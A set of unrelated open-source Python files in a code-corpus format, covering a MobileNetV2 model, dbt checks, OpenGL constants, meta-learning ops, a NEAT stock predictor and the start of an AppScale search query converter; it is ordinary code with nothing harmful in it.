This MobileNetV2 implementation is based on @alexisVallet's one.
@okdshin modified it for ChainerCV.
"""
def _depth_multiplied_output_channels(base_out_channels,
multiplier,
divisable_by=8,
min_depth=8):
return _make_divisible(base_out_channels * multiplier, divisable_by,
min_depth)
_tf_mobilenetv2_mean = np.asarray(
[128] * 3, dtype=np.float)[:, np.newaxis, np.newaxis]
# RGB order
_imagenet_mean = np.array(
[123.68, 116.779, 103.939], dtype=np.float32)[:, np.newaxis, np.newaxis]
class MobileNetV2(PickableSequentialChain):
"""MobileNetV2 Network.
This is a pickable sequential link.
The network can choose output layers from set of all
intermediate layers.
The attribute :obj:`pick` is the names of the layers that are going
to be picked by :meth:`__call__`.
The attribute :obj:`layer_names` is the names of all layers
that can be picked.
Examples:
>>> model = MobileNetV2()
# By default, __call__ returns a probability score (after Softmax).
>>> prob = model(imgs)
>>> model.pick = 'expanded_conv_5'
# This is layer expanded_conv_5.
>>> expanded_conv_5 = model(imgs)
>>> model.pick = ['expanded_conv_5', 'conv1']
>>> # These are layers expanded_conv_5 and conv1 (before Pool).
>>> expanded_conv_5, conv1 = model(imgs)
.. seealso::
:class:`chainercv.links.model.PickableSequentialChain`
When :obj:`pretrained_model` is the path of a pre-trained chainer model
serialized as a :obj:`.npz` file in the constructor, this chain model
automatically initializes all the parameters with it.
When a string in the prespecified set is provided, a pretrained model is
loaded from weights distributed on the Internet.
The list of pretrained models supported are as follows:
* :obj:`imagenet`: Loads weights trained with ImageNet. \
When :obj:`arch=='tf'`, the weights distributed \
at tensorflow/models
`<https://github.com/tensorflow/models/tree/master/research/slim/nets/mobilenet>`_ \ # NOQA
are used.
Args:
n_class (int): The number of classes. If :obj:`None`,
the default values are used.
If a supported pretrained model is used,
the number of classes used to train the pretrained model
is used. Otherwise, the number of classes in ILSVRC 2012 dataset
is used.
pretrained_model (string): The destination of the pre-trained
chainer model serialized as a :obj:`.npz` file.
If this is one of the strings described
above, it automatically loads weights stored under a directory
:obj:`$CHAINER_DATASET_ROOT/pfnet/chainercv/models/`,
where :obj:`$CHAINER_DATASET_ROOT` is set as
:obj:`$HOME/.chainer/dataset` unless you specify another value
by modifying the environment variable.
mean (numpy.ndarray): A mean value. If :obj:`None`,
the default values are used.
If a supported pretrained model is used,
the mean value used to train the pretrained model is used.
Otherwise, the mean value used by TF's implementation is used.
initialW (callable): Initializer for the weights.
initial_bias (callable): Initializer for the biases.
"""
# Batch normalization replicating default tensorflow slim parameters
# as used in the original tensorflow implementation.
_bn_tf_default_params = {
"decay": 0.999,
"eps": 0.001,
"dtype": chainer.config.dtype
}
_models = {
'tf': {
1.0: {
'imagenet': {
'param': {
'n_class': 1001, # first element is background
'mean': _tf_mobilenetv2_mean,
},
'overwritable': ('mean',),
'url':
'https://chainercv-models.preferred.jp/mobilenet_v2_depth_multiplier_1.0_imagenet_converted_2019_05_13.npz', # NOQA
}
},
1.4: {
'imagenet': {
'param': {
'n_class': 1001, # first element is background
'mean': _tf_mobilenetv2_mean,
},
'overwritable': ('mean',),
'url':
'https://chainercv-models.preferred.jp/mobilenet_v2_depth_multiplier_1.4_imagenet_converted_2019_05_13.npz', # NOQA
}
}
}
}
def __init__(self,
n_class=None,
pretrained_model=None,
mean=None,
initialW=None,
initial_bias=None,
arch='tf',
depth_multiplier=1.,
bn_kwargs=_bn_tf_default_params,
thousand_categories_mode=False):
if depth_multiplier <= 0:
raise ValueError('depth_multiplier must be greater than 0')
param, path = utils.prepare_pretrained_model({
'n_class': n_class,
'mean': mean,
}, pretrained_model, self._models[arch][depth_multiplier], {
'n_class': 1000,
'mean': _imagenet_mean,
})
self.mean = param['mean']
self.n_class = param['n_class']
super(MobileNetV2, self).__init__()
def relu6(x):
return clipped_relu(x, 6.)
with self.init_scope():
conv_out_channels = _depth_multiplied_output_channels(
32, depth_multiplier)
self.conv = TFConv2DBNActiv(
in_channels=3,
out_channels=conv_out_channels,
stride=2,
ksize=3,
nobias=True,
activ=relu6,
initialW=initialW,
bn_kwargs=bn_kwargs)
expanded_out_channels = _depth_multiplied_output_channels(
16, depth_multiplier)
self.expanded_conv = ExpandedConv2D(
expansion_size=expand_input_by_factor(1, divisible_by=1),
in_channels=conv_out_channels,
out_channels=expanded_out_channels,
initialW=initialW,
bn_kwargs=bn_kwargs)
in_channels = expanded_out_channels
out_channels_list = (24, ) * 2 + (32, ) * 3 + (64, ) * 4 + (
96, ) * 3 + (160, ) * 3 + (320, )
for i, out_channels in enumerate(out_channels_list):
layer_id = i + 1
if layer_id in (1, 3, 6, 13):
stride = 2
else:
stride = 1
multiplied_out_channels = _depth_multiplied_output_channels(
out_channels, depth_multiplier)
setattr(self, "expanded_conv_{}".format(layer_id),
ExpandedConv2D(
in_channels=in_channels,
out_channels=multiplied_out_channels,
depthwise_stride=stride,
initialW=initialW,
bn_kwargs=bn_kwargs))
in_channels = multiplied_out_channels
if depth_multiplier < 1:
conv1_out_channels = 1280
else:
conv1_out_channels = _depth_multiplied_output_channels(
1280, depth_multiplier)
self.conv1 = TFConv2DBNActiv(
in_channels=in_channels,
out_channels=conv1_out_channels,
ksize=1,
nobias=True,
initialW=initialW,
activ=relu6,
bn_kwargs=bn_kwargs)
self.global_average_pool = \
lambda x: average_pooling_2d(x, ksize=x.shape[2:4], stride=1)
self.logits_conv = TFConvolution2D(
in_channels=conv1_out_channels,
out_channels=self.n_class,
ksize=1,
nobias=False, # bias is needed
initialW=initialW,
initial_bias=initial_bias,
)
self.squeeze = lambda x: squeeze(x, axis=(2, 3))
self.softmax = softmax
if path:
chainer.serializers.load_npz(path, self)
if thousand_categories_mode and 1000 < n_class:
self.logits_conv.W.data = np.delete(self.logits_conv.W.data, 0, 0)
self.logits_conv.b.data = np.delete(self.logits_conv.b.data, 0)
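# A minimal usage sketch (hedged): build the network with randomly initialised
# weights (no pretrained download) and run a forward pass on dummy data. The
# n_class=10 and the 224x224 input size below are illustrative values only.
if __name__ == '__main__':
    model = MobileNetV2(n_class=10, depth_multiplier=1.0)
    model.pick = 'expanded_conv_5'
    dummy = np.random.uniform(size=(1, 3, 224, 224)).astype(np.float32)
    with chainer.using_config('train', False):
        feature = model(dummy)
    print(feature.shape)  # e.g. (1, 32, 28, 28), depending on the architecture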
|
what_is_the_mixin/demo2_1.py
|
NightmareQAQ/python-notes
| 106 |
118673
|
class HelloMixin:
def display(self):
print('HelloMixin hello')
class SuperHelloMixin:
def display(self):
print('SuperHello hello')
class A(SuperHelloMixin, HelloMixin):
pass
if __name__ == '__main__':
a = A()
a.display()
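# A brief note (hedged sketch): a.display() prints 'SuperHello hello' because
# Python's method resolution order searches the base classes left to right:
#   >>> [cls.__name__ for cls in A.__mro__]
#   ['A', 'SuperHelloMixin', 'HelloMixin', 'object']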
|
benchmarks/ud_benchmark/scripts/copy_files.py
|
apjanco/projects
| 823 |
118685
|
<gh_stars>100-1000
import typer
from pathlib import Path
import glob
import shutil
def main(stem: str, ext: str, input_dir: Path, output_dir: Path):
output_dir.mkdir(parents=True, exist_ok=True)
for filename in glob.glob(str(input_dir.resolve()) + f"/*-{stem}*.{ext}"):
shutil.copy(filename, str(output_dir.resolve()))
if __name__ == "__main__":
typer.run(main)
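# A hedged usage sketch (paths, stem and extension are hypothetical): copy all
# files matching "*-train*.conllu" from ./data into ./out with
#   python copy_files.py train conllu ./data ./out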
|
Tools/cython-epydoc.py
|
smok-serwis/cython
| 6,663 |
118721
|
#! /usr/bin/env python
# --------------------------------------------------------------------
import re
from epydoc import docstringparser as dsp
CYTHON_SIGNATURE_RE = re.compile(
# Class name (for builtin methods)
r'^\s*((?P<class>\w+)\.)?' +
# The function name
r'(?P<func>\w+)' +
# The parameters
r'\(((?P<self>(?:self|cls|mcs)),?)?(?P<params>.*)\)' +
# The return value (optional)
r'(\s*(->)\s*(?P<return>\w+(?:\s*\w+)))?' +
# The end marker
r'\s*(?:\n|$)')
parse_signature = dsp.parse_function_signature
def parse_function_signature(func_doc, doc_source,
docformat, parse_errors):
PYTHON_SIGNATURE_RE = dsp._SIGNATURE_RE
assert PYTHON_SIGNATURE_RE is not CYTHON_SIGNATURE_RE
try:
dsp._SIGNATURE_RE = CYTHON_SIGNATURE_RE
found = parse_signature(func_doc, doc_source,
docformat, parse_errors)
dsp._SIGNATURE_RE = PYTHON_SIGNATURE_RE
if not found:
found = parse_signature(func_doc, doc_source,
docformat, parse_errors)
return found
finally:
dsp._SIGNATURE_RE = PYTHON_SIGNATURE_RE
dsp.parse_function_signature = parse_function_signature
# --------------------------------------------------------------------
from epydoc.cli import cli
cli()
# --------------------------------------------------------------------
|
tests/unit/test_check_source_has_all_columns.py
|
jtalmi/pre-commit-dbt
| 153 |
118726
|
<reponame>jtalmi/pre-commit-dbt
import pytest
from pre_commit_dbt.check_source_has_all_columns import get_catalog_nodes
from pre_commit_dbt.check_source_has_all_columns import main
# Input schema, valid_catalog, expected return value
TESTS = (
(
"""
sources:
- name: catalog
tables:
- name: with_catalog_columns
columns:
- name: col1
- name: col2
""",
True,
0,
),
(
"""
sources:
- name: catalog
tables:
- name: with_catalog_columns
columns:
- name: col1
- name: col2
""",
False,
1,
),
(
"""
sources:
- name: catalog
tables:
- name: with_catalog_columns
columns:
- name: col1
""",
True,
1,
),
(
"""
sources:
- name: catalog
tables:
- name: with_catalog_columns
""",
True,
1,
),
(
"""
sources:
- name: catalog
tables:
- name: without_catalog_columns
""",
True,
0,
),
(
"""
sources:
- name: catalog
tables:
- name: without_catalog_columns
columns:
- name: col1
""",
True,
1,
),
(
"""
sources:
- name: catalog
tables:
- name: without_catalog
columns:
- name: col1
""",
True,
1,
),
)
@pytest.mark.parametrize(
("input_schema", "valid_catalog", "expected_status_code"), TESTS
)
def test_check_source_columns_have_desc(
input_schema, valid_catalog, expected_status_code, catalog_path_str, tmpdir
):
yml_file = tmpdir.join("schema.yml")
input_args = [str(yml_file)]
yml_file.write(input_schema)
if valid_catalog:
input_args.extend(["--catalog", catalog_path_str])
status_code = main(argv=input_args)
assert status_code == expected_status_code
def test_get_catalog_nodes():
input_txt = {
"sources": {
"source.test.catalog_cols": {
"metadata": {},
"columns": {
"COL1": {"type": "TEXT", "index": 1, "name": "COL1"},
"COL2": {"type": "TEXT", "index": 2, "name": "COL1"},
},
}
}
}
result = get_catalog_nodes(input_txt)
assert list(result.keys()) == [frozenset({"test", "catalog_cols"})]
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/ARB/shader_image_load_store.py
|
ShujaKhalid/deep-rl
| 210 |
118743
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_shader_image_load_store'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_shader_image_load_store',error_checker=_errors._error_checker)
GL_ALL_BARRIER_BITS=_C('GL_ALL_BARRIER_BITS',0xFFFFFFFF)
GL_ATOMIC_COUNTER_BARRIER_BIT=_C('GL_ATOMIC_COUNTER_BARRIER_BIT',0x00001000)
GL_BUFFER_UPDATE_BARRIER_BIT=_C('GL_BUFFER_UPDATE_BARRIER_BIT',0x00000200)
GL_COMMAND_BARRIER_BIT=_C('GL_COMMAND_BARRIER_BIT',0x00000040)
GL_ELEMENT_ARRAY_BARRIER_BIT=_C('GL_ELEMENT_ARRAY_BARRIER_BIT',0x00000002)
GL_FRAMEBUFFER_BARRIER_BIT=_C('GL_FRAMEBUFFER_BARRIER_BIT',0x00000400)
GL_IMAGE_1D=_C('GL_IMAGE_1D',0x904C)
GL_IMAGE_1D_ARRAY=_C('GL_IMAGE_1D_ARRAY',0x9052)
GL_IMAGE_2D=_C('GL_IMAGE_2D',0x904D)
GL_IMAGE_2D_ARRAY=_C('GL_IMAGE_2D_ARRAY',0x9053)
GL_IMAGE_2D_MULTISAMPLE=_C('GL_IMAGE_2D_MULTISAMPLE',0x9055)
GL_IMAGE_2D_MULTISAMPLE_ARRAY=_C('GL_IMAGE_2D_MULTISAMPLE_ARRAY',0x9056)
GL_IMAGE_2D_RECT=_C('GL_IMAGE_2D_RECT',0x904F)
GL_IMAGE_3D=_C('GL_IMAGE_3D',0x904E)
GL_IMAGE_BINDING_ACCESS=_C('GL_IMAGE_BINDING_ACCESS',0x8F3E)
GL_IMAGE_BINDING_FORMAT=_C('GL_IMAGE_BINDING_FORMAT',0x906E)
GL_IMAGE_BINDING_LAYER=_C('GL_IMAGE_BINDING_LAYER',0x8F3D)
GL_IMAGE_BINDING_LAYERED=_C('GL_IMAGE_BINDING_LAYERED',0x8F3C)
GL_IMAGE_BINDING_LEVEL=_C('GL_IMAGE_BINDING_LEVEL',0x8F3B)
GL_IMAGE_BINDING_NAME=_C('GL_IMAGE_BINDING_NAME',0x8F3A)
GL_IMAGE_BUFFER=_C('GL_IMAGE_BUFFER',0x9051)
GL_IMAGE_CUBE=_C('GL_IMAGE_CUBE',0x9050)
GL_IMAGE_CUBE_MAP_ARRAY=_C('GL_IMAGE_CUBE_MAP_ARRAY',0x9054)
GL_IMAGE_FORMAT_COMPATIBILITY_BY_CLASS=_C('GL_IMAGE_FORMAT_COMPATIBILITY_BY_CLASS',0x90C9)
GL_IMAGE_FORMAT_COMPATIBILITY_BY_SIZE=_C('GL_IMAGE_FORMAT_COMPATIBILITY_BY_SIZE',0x90C8)
GL_IMAGE_FORMAT_COMPATIBILITY_TYPE=_C('GL_IMAGE_FORMAT_COMPATIBILITY_TYPE',0x90C7)
GL_INT_IMAGE_1D=_C('GL_INT_IMAGE_1D',0x9057)
GL_INT_IMAGE_1D_ARRAY=_C('GL_INT_IMAGE_1D_ARRAY',0x905D)
GL_INT_IMAGE_2D=_C('GL_INT_IMAGE_2D',0x9058)
GL_INT_IMAGE_2D_ARRAY=_C('GL_INT_IMAGE_2D_ARRAY',0x905E)
GL_INT_IMAGE_2D_MULTISAMPLE=_C('GL_INT_IMAGE_2D_MULTISAMPLE',0x9060)
GL_INT_IMAGE_2D_MULTISAMPLE_ARRAY=_C('GL_INT_IMAGE_2D_MULTISAMPLE_ARRAY',0x9061)
GL_INT_IMAGE_2D_RECT=_C('GL_INT_IMAGE_2D_RECT',0x905A)
GL_INT_IMAGE_3D=_C('GL_INT_IMAGE_3D',0x9059)
GL_INT_IMAGE_BUFFER=_C('GL_INT_IMAGE_BUFFER',0x905C)
GL_INT_IMAGE_CUBE=_C('GL_INT_IMAGE_CUBE',0x905B)
GL_INT_IMAGE_CUBE_MAP_ARRAY=_C('GL_INT_IMAGE_CUBE_MAP_ARRAY',0x905F)
GL_MAX_COMBINED_IMAGE_UNIFORMS=_C('GL_MAX_COMBINED_IMAGE_UNIFORMS',0x90CF)
GL_MAX_COMBINED_IMAGE_UNITS_AND_FRAGMENT_OUTPUTS=_C('GL_MAX_COMBINED_IMAGE_UNITS_AND_FRAGMENT_OUTPUTS',0x8F39)
GL_MAX_FRAGMENT_IMAGE_UNIFORMS=_C('GL_MAX_FRAGMENT_IMAGE_UNIFORMS',0x90CE)
GL_MAX_GEOMETRY_IMAGE_UNIFORMS=_C('GL_MAX_GEOMETRY_IMAGE_UNIFORMS',0x90CD)
GL_MAX_IMAGE_SAMPLES=_C('GL_MAX_IMAGE_SAMPLES',0x906D)
GL_MAX_IMAGE_UNITS=_C('GL_MAX_IMAGE_UNITS',0x8F38)
GL_MAX_TESS_CONTROL_IMAGE_UNIFORMS=_C('GL_MAX_TESS_CONTROL_IMAGE_UNIFORMS',0x90CB)
GL_MAX_TESS_EVALUATION_IMAGE_UNIFORMS=_C('GL_MAX_TESS_EVALUATION_IMAGE_UNIFORMS',0x90CC)
GL_MAX_VERTEX_IMAGE_UNIFORMS=_C('GL_MAX_VERTEX_IMAGE_UNIFORMS',0x90CA)
GL_PIXEL_BUFFER_BARRIER_BIT=_C('GL_PIXEL_BUFFER_BARRIER_BIT',0x00000080)
GL_SHADER_IMAGE_ACCESS_BARRIER_BIT=_C('GL_SHADER_IMAGE_ACCESS_BARRIER_BIT',0x00000020)
GL_TEXTURE_FETCH_BARRIER_BIT=_C('GL_TEXTURE_FETCH_BARRIER_BIT',0x00000008)
GL_TEXTURE_UPDATE_BARRIER_BIT=_C('GL_TEXTURE_UPDATE_BARRIER_BIT',0x00000100)
GL_TRANSFORM_FEEDBACK_BARRIER_BIT=_C('GL_TRANSFORM_FEEDBACK_BARRIER_BIT',0x00000800)
GL_UNIFORM_BARRIER_BIT=_C('GL_UNIFORM_BARRIER_BIT',0x00000004)
GL_UNSIGNED_INT_IMAGE_1D=_C('GL_UNSIGNED_INT_IMAGE_1D',0x9062)
GL_UNSIGNED_INT_IMAGE_1D_ARRAY=_C('GL_UNSIGNED_INT_IMAGE_1D_ARRAY',0x9068)
GL_UNSIGNED_INT_IMAGE_2D=_C('GL_UNSIGNED_INT_IMAGE_2D',0x9063)
GL_UNSIGNED_INT_IMAGE_2D_ARRAY=_C('GL_UNSIGNED_INT_IMAGE_2D_ARRAY',0x9069)
GL_UNSIGNED_INT_IMAGE_2D_MULTISAMPLE=_C('GL_UNSIGNED_INT_IMAGE_2D_MULTISAMPLE',0x906B)
GL_UNSIGNED_INT_IMAGE_2D_MULTISAMPLE_ARRAY=_C('GL_UNSIGNED_INT_IMAGE_2D_MULTISAMPLE_ARRAY',0x906C)
GL_UNSIGNED_INT_IMAGE_2D_RECT=_C('GL_UNSIGNED_INT_IMAGE_2D_RECT',0x9065)
GL_UNSIGNED_INT_IMAGE_3D=_C('GL_UNSIGNED_INT_IMAGE_3D',0x9064)
GL_UNSIGNED_INT_IMAGE_BUFFER=_C('GL_UNSIGNED_INT_IMAGE_BUFFER',0x9067)
GL_UNSIGNED_INT_IMAGE_CUBE=_C('GL_UNSIGNED_INT_IMAGE_CUBE',0x9066)
GL_UNSIGNED_INT_IMAGE_CUBE_MAP_ARRAY=_C('GL_UNSIGNED_INT_IMAGE_CUBE_MAP_ARRAY',0x906A)
GL_VERTEX_ATTRIB_ARRAY_BARRIER_BIT=_C('GL_VERTEX_ATTRIB_ARRAY_BARRIER_BIT',0x00000001)
@_f
@_p.types(None,_cs.GLuint,_cs.GLuint,_cs.GLint,_cs.GLboolean,_cs.GLint,_cs.GLenum,_cs.GLenum)
def glBindImageTexture(unit,texture,level,layered,layer,access,format):pass
@_f
@_p.types(None,_cs.GLbitfield)
def glMemoryBarrier(barriers):pass
|
babybuddy/migrations/0002_add_settings.py
|
Gitoffomalawn/babybuddy
| 922 |
118771
|
<reponame>Gitoffomalawn/babybuddy
# -*- coding: utf-8 -*-
from django.db import migrations
def add_settings(apps, schema_editor):
Settings = apps.get_model("babybuddy", "Settings")
User = apps.get_model("auth", "User")
for user in User.objects.all():
if Settings.objects.filter(user=user).count() == 0:
settings = Settings.objects.create(user=user)
settings.save()
class Migration(migrations.Migration):
initial = True
dependencies = [
("babybuddy", "0001_initial"),
]
operations = [
migrations.RunPython(add_settings, reverse_code=migrations.RunPython.noop),
]
|
ops.py
|
HAHA-DL/MLDG
| 109 |
118777
|
import torch.autograd as autograd
import torch.nn.functional as F
from torch.autograd import Variable
def linear(inputs, weight, bias, meta_step_size=0.001, meta_loss=None, stop_gradient=False):
if meta_loss is not None:
if not stop_gradient:
grad_weight = autograd.grad(meta_loss, weight, create_graph=True)[0]
if bias is not None:
grad_bias = autograd.grad(meta_loss, bias, create_graph=True)[0]
bias_adapt = bias - grad_bias * meta_step_size
else:
bias_adapt = bias
else:
grad_weight = Variable(autograd.grad(meta_loss, weight, create_graph=True)[0].data, requires_grad=False)
if bias is not None:
grad_bias = Variable(autograd.grad(meta_loss, bias, create_graph=True)[0].data, requires_grad=False)
bias_adapt = bias - grad_bias * meta_step_size
else:
bias_adapt = bias
return F.linear(inputs,
weight - grad_weight * meta_step_size,
bias_adapt)
else:
return F.linear(inputs, weight, bias)
def conv2d(inputs, weight, bias, meta_step_size=0.001, stride=1, padding=0, dilation=1, groups=1, meta_loss=None,
stop_gradient=False):
if meta_loss is not None:
if not stop_gradient:
grad_weight = autograd.grad(meta_loss, weight, create_graph=True)[0]
if bias is not None:
grad_bias = autograd.grad(meta_loss, bias, create_graph=True)[0]
bias_adapt = bias - grad_bias * meta_step_size
else:
bias_adapt = bias
else:
grad_weight = Variable(autograd.grad(meta_loss, weight, create_graph=True)[0].data,
requires_grad=False)
if bias is not None:
grad_bias = Variable(autograd.grad(meta_loss, bias, create_graph=True)[0].data, requires_grad=False)
bias_adapt = bias - grad_bias * meta_step_size
else:
bias_adapt = bias
return F.conv2d(inputs,
weight - grad_weight * meta_step_size,
bias_adapt, stride,
padding,
dilation, groups)
else:
return F.conv2d(inputs, weight, bias, stride, padding, dilation, groups)
def relu(inputs):
return F.threshold(inputs, 0, 0, inplace=True)
def maxpool(inputs, kernel_size, stride=None, padding=0):
return F.max_pool2d(inputs, kernel_size, stride, padding=padding)
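# A minimal, hedged sketch of how these functional ops are typically used in
# MLDG-style meta-learning: a loss computed on meta-train data is passed as
# `meta_loss`, and the meta-test forward pass then uses weights updated by one
# "virtual" gradient step. The shapes and the squared-output loss below are
# illustrative only, not taken from the original training code.
if __name__ == '__main__':
    import torch
    w = torch.randn(4, 8, requires_grad=True)   # weight of a linear layer
    b = torch.zeros(4, requires_grad=True)      # bias of the same layer
    x_train = torch.randn(2, 8)                 # meta-train batch
    x_test = torch.randn(2, 8)                  # meta-test batch
    # Ordinary forward pass on the meta-train batch and a dummy loss.
    meta_train_loss = F.linear(x_train, w, b).pow(2).mean()
    # Meta-test forward pass with a one-step virtual update of w and b.
    out = linear(x_test, w, b, meta_step_size=0.001,
                 meta_loss=meta_train_loss, stop_gradient=False)
    print(out.shape)  # torch.Size([2, 4])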
|
Nasdaq Evolved Network/evolve-feedforward.py
|
ag88/Test-stock-prediction-algorithms
| 385 |
118813
|
# https://github.com/timestocome
# Take the xor neat-python example and convert it to predict tomorrow's stock
# market change using the last 5 days of data.
# uses Python NEAT library
# https://github.com/CodeReclaimers/neat-python
from __future__ import print_function
import os
import neat
import visualize
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
##############################################################################
# stock data previously input, loaded and log leveled
# using LoadAndMatchDates.py, LevelData.py
# reading output LeveledLogStockData.csv
# pick one, any one and use it as input/output
###############################################################################
# read data in
data = pd.read_csv('LeveledLogStockData.csv')
#print(data.columns)
#print(data)
# select an index to use to train network
index = data['leveled log Nasdaq'].values
n_samples = len(index)
# split into inputs and outputs
n_inputs = 5 # number of days to use as input
n_outputs = 1 # predict next day
x = []
y = []
for i in range(n_samples - n_inputs - 1):
x.append(index[i:i+n_inputs] )
y.append([index[i+1]])
x = np.asarray(x)
y = np.asarray(y)
#print(x.shape, y.shape)
# hold out last samples for testing
n_train = int(n_samples * .9)
n_test = n_samples - n_train
print('train, test', n_train, n_test)
train_x = x[0:n_train]
test_x = x[n_train:-1]
train_y = y[0:n_train]
test_y = y[n_train:-1]
print('data split', train_x.shape, train_y.shape)
print('data split', test_x.shape, test_y.shape)
# shuffle training data?
z = np.arange(0, n_train-1)
np.random.shuffle(z)
tx = train_x[z[::-1]]
ty = train_y[z[::-1]]
train_x = tx
train_y = ty
###############################################################################
# some of these need to be updated in the config-feedforward file
# fitness_threshold = n_train - 1
# num_inputs => n_inputs
# num_hidden => ? how many hidden nodes do you want?
# num_outputs => n_outputs
#
# optional changes
# population size, activation function, .... others as needed
###############################################################################
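# A hedged sketch of the matching entries in config-feedforward (the values are
# illustrative; the real file contains many more sections and keys):
#   [NEAT]
#   fitness_criterion = max
#   fitness_threshold = 9000      # set this to n_train - 1 printed above
#   pop_size          = 150
#   [DefaultGenome]
#   num_inputs        = 5
#   num_hidden        = 0
#   num_outputs       = 1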
n_generations = 10
n_evaluate = 1
clip_error = 4.
lr = 0.1
def eval_genomes(genomes, config):
for genome_id, genome in genomes:
genome.fitness = n_train
net = neat.nn.FeedForwardNetwork.create(genome, config)
for xi, xo in zip(train_x, train_y):
output = net.activate(xi)
error = (output[0] - xo[0]) **2
# clipping the error keeps more species in play
#genome.fitness -= lr * error
if error < clip_error:
genome.fitness -= error
else:
genome.fitness -= clip_error
def run(config_file):
# Load configuration.
config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_file)
# Create the population, which is the top-level object for a NEAT run.
p = neat.Population(config)
# Add a stdout reporter to show progress in the terminal.
# True == show all species, False == don't show species
p.add_reporter(neat.StdOutReporter(False))
stats = neat.StatisticsReporter()
p.add_reporter(stats)
p.add_reporter(neat.Checkpointer(5))
# Stop running after n=n_generations
# if n=None runs until solution is found
winner = p.run(eval_genomes, n=n_generations)
# Display the winning genome.
print('\nBest genome:\n{!s}'.format(winner))
# Show output of the most fit genome against testing data.
print('\nTest Output, Actual, Diff:')
winner_net = neat.nn.FeedForwardNetwork.create(winner, config)
predicted = []
for xi, xo in zip(test_x, test_y):
output = winner_net.activate(xi)
predicted.append(output)
node_names = {-1:'4', -2: '3', -3: '2', -4: '1', -5: '0', 0:'Predict Change'}
visualize.draw_net(config, winner, True, node_names=node_names)
visualize.plot_stats(stats, ylog=False, view=True)
visualize.plot_species(stats, view=True)
# ? save?
#p = neat.Checkpointer.restore_checkpoint('neat-checkpoint')
#p.run(eval_genomes, n_evaluate)
# plot predictions vs actual
plt.plot(test_y, 'g', label='Actual')
plt.plot(predicted, 'r-', label='Predicted')
plt.title('Test Data')
plt.legend()
plt.show()
if __name__ == '__main__':
    # find and load the configuration file
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, 'config-feedforward')
run(config_path)
|
SearchService2/appscale/search/query_converter.py
|
loftwah/appscale
| 790 |
118814
|
"""
Code for turning a GAE Search query into a SOLR query.
"""
import logging
from appscale.search.constants import InvalidRequest
from appscale.search.models import SolrQueryOptions, SolrSchemaFieldInfo
from appscale.search.query_parser import parser
logger = logging.getLogger(__name__)
def prepare_solr_query(gae_query, fields, grouped_fields):
""" Converts gae_query string into Solr query string.
Args:
gae_query: a str containing GAE Search query.
fields: a list of SolrSchemaFieldInfo.
grouped_fields: a dict containing mapping from GAE field name
to list of SolrSchemaFieldInfo.
Returns:
An instance of SolrQueryOptions.
"""
converter = _QueryConverter(gae_query, fields, grouped_fields)
return converter.solr_query()
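# An illustrative (hedged) example of the conversion performed above. The Solr
# field names are hypothetical, since real names come from the index schema in
# `fields` / `grouped_fields`, and the exact output depends on the parser:
#   GAE query:  product:shoes AND price < 100
#   Solr query: (product_atom:"shoes" AND price_number:[* TO "100"})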
_SOLR_TYPE = SolrSchemaFieldInfo.Type
class _QueryConverter(object):
"""
  It could be just a set of functions, but having a self reference helps
  to store temporary values and simplifies recursive query rendering.
"""
NOT_MATCHABLE = u'id:""' # A Solr query which matches nothing.
GLOBAL_SEARCH = object() # A constant to mark missing field in expression.
class NotApplicableValue(Exception):
""" Helper exception which is used to follow principle
"Ask forgiveness not permission". It's not always easy
to figure out in advance if it's reasonable to go deeper into
nested syntax tree nodes to prepare query for number or date field
as we don't know what type has a right hand values of expression.
"""
pass
def __init__(self, gae_query, fields, grouped_fields):
""" Initializes instance of _QueryConverter.
Args:
gae_query: A str representing query sent by user.
fields: a list of SolrSchemaFieldInfo.
grouped_fields: a dict containing mapping from GAE field name
to list of SolrSchemaFieldInfo.
"""
self.gae_query = gae_query
self.schema_fields = fields
self.grouped_schema_fields = grouped_fields
self.has_string_values = False
self.has_date_values = False
self.has_number_values = False
self.has_geo_values = False
def solr_query(self):
""" Generates SolrQueryOptions containing solr query string,
query fields and def_type (type of Solr query parser to use).
Returns:
An instance of SolrQueryOptions to use in Solr request.
"""
if not self.gae_query:
return SolrQueryOptions(
query_string='*:*',
query_fields=[],
def_type='edismax'
)
# Build syntax tree
expr_or_exprs_group = parser.parse_query(self.gae_query)
# Render Solr query string according to the syntax tree
try:
solr_query = self._render_exprs(expr_or_exprs_group)
except self.NotApplicableValue:
solr_query = self.NOT_MATCHABLE
# Find all fields which need to be queried for global search
query_fields = []
if self.has_string_values:
query_fields += [
schema_field.solr_name for schema_field in self.schema_fields
if (
schema_field.type == _SOLR_TYPE.ATOM_FIELD
or schema_field.type == _SOLR_TYPE.TEXT_FIELD
)
]
if self.has_date_values:
query_fields += [
schema_field.solr_name for schema_field in self.schema_fields
if schema_field.type == _SOLR_TYPE.DATE_FIELD
]
if self.has_number_values:
query_fields += [
schema_field.solr_name for schema_field in self.schema_fields
if schema_field.type == _SOLR_TYPE.NUMBER_FIELD
]
return SolrQueryOptions(
query_string=solr_query,
query_fields=query_fields,
def_type='edismax'
)
def _render_exprs(self, expr_or_exprs_group):
""" Renders an Expression or ExpressionsGroup.
Args:
expr_or_exprs_group: an Expression or ExpressionsGroup to render.
Return:
a str representing Solr query corresponding to expr_or_exprs_group.
"""
if isinstance(expr_or_exprs_group, parser.Expression):
expr = expr_or_exprs_group
return self._render_single_expr(expr)
exprs_group = expr_or_exprs_group
rendered_elements = []
for element in exprs_group.elements:
try:
rendered = self._render_exprs(element)
rendered_elements.append(rendered)
except self.NotApplicableValue:
# Element can't be matched: field is missing or value is not applicable
if exprs_group.operator == parser.AND:
# Expressions group doesn't match as one AND elements doesn't match.
raise
continue
if not rendered_elements:
raise self.NotApplicableValue()
if len(rendered_elements) == 1:
return rendered_elements[0]
operator = u' AND ' if exprs_group.operator == parser.AND else u' OR '
return u'({})'.format(operator.join(rendered_elements))
def _render_single_expr(self, expr):
""" Renders a single Expression which corresponds to either
field-specific or global search expression.
    A single expression can be expanded to a group of expressions
    connected by OR, where each nested expression corresponds to
    one of the field types. This is done because GAE allows fields
    with different types but the same name, so one GAE field name
    maps to a number of different Solr fields.
Args:
